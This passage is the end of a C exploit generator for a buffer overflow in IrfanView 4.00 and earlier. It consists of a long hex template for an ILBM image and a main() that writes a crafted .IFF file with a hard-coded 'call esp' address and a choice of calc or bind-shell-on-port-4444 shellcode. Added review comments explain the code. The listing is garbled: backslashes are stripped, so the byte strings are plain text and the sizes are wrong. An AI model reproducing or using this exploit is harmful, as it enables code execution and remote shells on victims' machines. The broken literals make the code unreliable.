"x00xebx00x06x40x00x40x00x02x60x01xffx00x04x10x80"
"xe3x80x04xe5x00xc1x00xc1x00xc1x00xecxffx05xf9x3f"
"xfexfdxffxfbxfdxffx05xf7x7fxefx1fxffxebxe7xffx00"
"xf8xecx00x0fx05x80x01x78x00x03x00x01x80x00x03xc0"
"x17x80x00x20xe6x00xecx00x0fx03xc0x00xfex00x07x80"
"x00xc0x00x0fx80x0fxe0x00x3cxe6x00xe9x00x00x84xff"
"x00x06x80x01x40x00x04x40x08xffx00x00x28xe6x00xec"
"x00x00x01xffx00x00x0exfex00x00x01xffx00x05x08x40"
"x00x20x00x2cxe6x00xc1x00xc1x00xc1x00xe7xffx00xfe"
"xfdxffx03xfexcfxf8xf7xffxffx00x7fxe8xffx00xf8xec"
"x00x0fx0dx80x0fxf8x00x16x00x01x80x00x03xc0x01xe8"
"x00x0cxe6x00xecx00x05x1ex80x0bxe8x00x1fxffx00x08"
"xc0x00x01xf0x07xf0x00x1fx80xe7x00xecx00x0ax13x80"
"x0cx18x00x18x00x01x40x00x02xffx00x02x10x00x13xe6"
"x00xecx00x07x1dx80x0ex38x00x10x00x01xffx00x02x02"
"x10x04xffx00x01x1dx80xe7x00xc1x00xc1x00xc1x00xec"
"xffx05xebxffxc7xbfxffxdfxfdxffx06xfexefxffxfexff"
"xfbx7fxe8xffx00xf8xecx00x08x08x00x0fx40x00x1cx00"
"x01x80xffx00x05x78x01xfcx00x01x80xe7x00xecx00x05"
"x14x00x3fx80x00x3exffx00x08xc0x00x01xf0x01x7fx00"
"x07xc0xe7x00xecx00x00x08xffx00x05x80x00x02x00x01"
"x40xffx00x05x88x01x82x00x02x40xe7x00xecx00x02x0c"
"x00x20xffx00x02x32x00x01xffx00x05x01x08x01xc7x00"
"x07xe6x00xc1x00xc1x00xc1x00xedxffx00xf7xffxffx00"
"x58xffxffx00xbbxfcxffx05xd9xffxdex3fxffx3fxe8xff"
"x00xf8xedx00x00x06xffx00x00xbcxffx00x03x7cx00x01"
"x80xffx00x02x78x00x2fxffx00x00x40xe7x00xedx00x00"
"x0axffx00x00x7fxffx00x00x38xffx00x00xc0xffx00x05"
"x3ex00x1fxc0x00x80xe7x00xedx00x00x06xffx00x00x40"
"xfdx00x01x01x40xffx00x02x40x00x10xe4x00xedx00x00"
"x0exffx00x00x01xffx00x02x20x00x01xfex00x00x42xff"
"x00x02x40x00x80xe7x00xc1x00xc1x00xc1x00xedxffx00"
"xf7xfcxffx00x27xfcxffx06xddxffxf3xefxffxfdx3fxe9"
"xffx00xf8xedx00x03x6ax00x02xf4xffx00x03xf8x00x01"
"x80xffx00x06x0fx00x03xd0x00x01x40xe8x00xedx00x03"
"x5ex00x01xfcxffx00x00x70xffx00x00xc0xffx00x06x3e"
"x00x0fxe0x00x03x80xe8x00xedx00x03x76x00x03x0cxfd"
"x00x01x01x40xffx00x00x11xffx00x00x20xe5x00xedx00"
"x03x62x00x02x1cxfdx00x00x01xfex00x02x21x00x0axff"
"x00x00x03xe7x00xc1x00xc1x00xc1x00xeexffx04xfexa7"
"xffxefxdfxffxffx00xefxfcxffx03xfbxbfxffxfdxffxff"
"x00xe7xe9xffx00xf8xeex00x04x01x60x00x07xa0xffx00"
"x03xe0x00x01x80xffx00x06x0fx00x03xf8x00x01x68xe8"
"x00xedx00x06xf8x00x1fxc0x00x01xf0xffx00x00xc0xff"
"x00x03x07xc0x02xfexffx00x00xf0xe8x00xedx00x05x80"
"x00x08x40x00x01xffx00x01x01x40xffx00x06x08x80x03"
"x04x00x01x80xe8x00xedx00x02x28x00x1cxffx00x03x01"
"x30x00x01xfex00x06x08x40x03x8ex00x01x60xe8x00xc1"
"x00xc1x00xc1x00xeexffx06xfex3fxffx8cx7fxffxfdxfb"
"xffx06xfbxbfxffxbcx7fxffxdbxe9xffx00xf8xedx00x02"
"x40x00x5exffx00x04x01xa0x00x01x80xffx00x06x01xe0"
"x00x5ex80x00x68xe8x00xeex00x07x01x80x00x3fx80x00"
"x03xe0xffx00x00xc0xffx00x03x07xc0x00x3fxffx00x00"
"x5cxe8x00xe7x00x03x60x00x01x40xffx00x03x02x20x00"
"x20xffx00x00x50xe8x00xeax00x00x80xffx00x02x20x00"
"x01xfex00x01x04x20xfdx00x00x48xe8x00xc1x00xc1x00"
"xc1x00xeexffx03xbfxffxfexfdxfexffx00x7fxfbxffx02"
"xf7xffxefxffxffx00xfbxe9xffx00xf8xeex00x03x60x00"
"x01x78xffx00x00x03xffx00x01x01x80xffx00x04x01xe0"
"x00x07xa0xffx00x00x10xe9x00xeex00x00x20xffx00x00"
"xfexffx00x01x07x80xffx00x00xc0xfex00x06xf8x00x1f"
"xc0x00x04x10xe9x00xeex00x00x20xffx00x00x84xffx00"
"x00x04xffx00x01x01x40xffx00x04x01x10x00x08x60xff"
"x00x00x10xe9x00xeex00x00x20xffx00x00x0exfcx00x00"
"x01xfex00x07x01x88x00x1cx20x00x04x10xe9x00xc1x00"
"xc1x00xc1x00xefxffx03xfcxdfxffxf7xfexffx00xefxfa"
"xffx00xb7xffxffx00xfbxffxffx00xddxeaxffx00xf8xee"
"x00x03xc0x00x03xd0xffx00x00x06xffx00x01x01x80xfe"
"x00x03xbcx00x02xf0xffx00x00x14xe9x00xefx00x04x03"
"xe0x00x0fxe0xffx00x00x1fxfex00x00xc0xfex00x03xf8"
"x00x01xfcxffx00x00x3axe9x00xecx00x01x04x30xffx00"
"x00x09xffx00x01x01x40xfex00x03x84x00x03x08xffx00"
"x00x0cxe9x00xefx00x04x02xe0x00x0ex10xffx00x00x11"
"xffx00x00x01xfdx00x03x84x00x02x1cxffx00x00x36xe9"
"x00xc1x00xc1x00xc1x00xefxffx04xefxbfxffxc7xbfxff"
"xffx00xdfxfaxffx00xdexffxffx00x18xffxffx01xe5xbf"
"xebxffx00xf8xefx00x04x06x80x00x0fx40xffx00x00x1e"
"xffx00x01x01x80xfex00x00x3cxffx00x00xbdxffx00x01"
"x06x80xeax00xefx00x04x1fx40x00x3fx80xffx00x00x3c"
"xfex00x00xc0xfex00x00x1fxffx00x00x7exffx00x01x1f"
"x40xeax00xefx00x01x09x80xffx00x00x80xffx00x00x02"
"xffx00x01x01x40xfex00x00x02xfcx00x01x01x80xeax00"
"xefx00x03x1exc0x00x20xfex00x00x32xffx00x00x01xfd"
"x00x00x11xfcx00x01x14xc0xeax00xc1x00xc1x00xc1x00"
"xefxffx00xfdxffxffx00x7exfexffx00x93xfaxffx00xf6"
"xffxffx00xdfxffxffx00xfdxeaxffx00xf8xefx00x00x0c"
"xffx00x00xbcxfex00x00x7cxffx00x01x01x80xfex00x04"
"x17x80x00x0fx60xffx00x00x80xeax00xefx00x00x1axff"
"x00x00x7fxfex00x00x38xfex00x00xc0xfex00x00x1fxff"
;
/*
 * Generator for the crafted .IFF file described in the header comment.
 *
 * Usage: argv[1] is the mode (0 selects CalcShellcode, anything else selects
 * BindShellcode), argv[2] is the output path. The file is assembled in a
 * fixed-size stack buffer from iff_file_part1 followed by iff_file_part2,
 * then the first bytes of the part2 region are overwritten with an 8-byte
 * value plus the chosen payload, and the buffer is written out.
 *
 * Reading aid for analysts: the hex in iff_file_part1 decodes to the IFF
 * chunk IDs FORM / ILBM / BMHD / CMAP, later CAMG and BODY, so the output is
 * an ILBM image and the patched region apparently sits inside the BODY chunk
 * data. An image-viewer process that starts calc.exe or a command shell, or
 * that listens on TCP 4444, is the observable effect the header describes;
 * the header gives IrfanView <= 4.00 as the affected range.
 *
 * NOTE(review): this listing appears to have lost its backslashes in
 * extraction (the printf strings end in a bare "n"), so the string literals
 * here are plain text rather than the byte sequences the comments describe,
 * and every sizeof() below is correspondingly larger than intended.
 *
 * Returns 0 on every path, including the usage and fopen failure paths.
 */
int main(int argc, char* argv[])
{
FILE* ifffile;
/* Fixed staging buffer; nothing below checks that the two templates fit. */
char evilbuff[10000];
int offset=0;
printf("[+] IrfanView <= 4.00 .IFF File Buffer Overflown");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
/* Exactly two arguments are required: mode and output file name. */
if (argc!=3) {
printf("[+] Usage: %s Mode <file.iff>n",argv[0]);
printf("[+] Mode is 0 -> run calc.exen");
printf("[+] 1 -> bind shell to port 4444n");
return 0;
}
/* Lay the two templates out back to back; sizeof-1 drops each array's
 * implicit terminating NUL. memcpy is used although only stdio.h and
 * stdlib.h are included above (string.h is missing). */
memcpy(evilbuff,iff_file_part1,sizeof(iff_file_part1)-1);
offset=sizeof(iff_file_part1)-1;
memcpy(evilbuff+offset,iff_file_part2,sizeof(iff_file_part2)-1);
/* Overwrite the first 8 bytes of the part2 region. The author labels the
 * value as the address of a "call esp" in kernel32; a hard-coded module
 * address like this is presumably tied to the one build the header says was
 * tested (Win XP SP2 FR) - confirm before relying on it for triage. */
memcpy(evilbuff+offset,"x8bx51x81x7cx43x43x43x43",8); //call esp in kernel32
/* Mode selection: atoi() yields 0 for "0" and for non-numeric input, so
 * both pick CalcShellcode; any other number picks BindShellcode. The payload
 * is placed immediately after the 8-byte overwrite. */
if (!atoi(argv[1]))
memcpy(evilbuff+offset+8,CalcShellcode,sizeof(CalcShellcode)-1);
else
memcpy(evilbuff+offset+8,BindShellcode,sizeof(BindShellcode)-1);
printf("[+] iff_file_part2 patched!n");
/* Binary mode so the bytes are written unmodified on Windows. */
if ((ifffile=fopen(argv[2],"wb"))==0) {
printf("[-] Unable to access file.n");
return 0;
}
/* Output length is both templates minus their two terminators; the payload
 * replaces template bytes rather than extending the file. The fwrite and
 * fclose results are not checked. */
fwrite( evilbuff, 1, sizeof(iff_file_part2)+sizeof(iff_file_part1)-2, ifffile );
fclose(ifffile);
printf("[+] Done. Have fun!n");
return 0;
}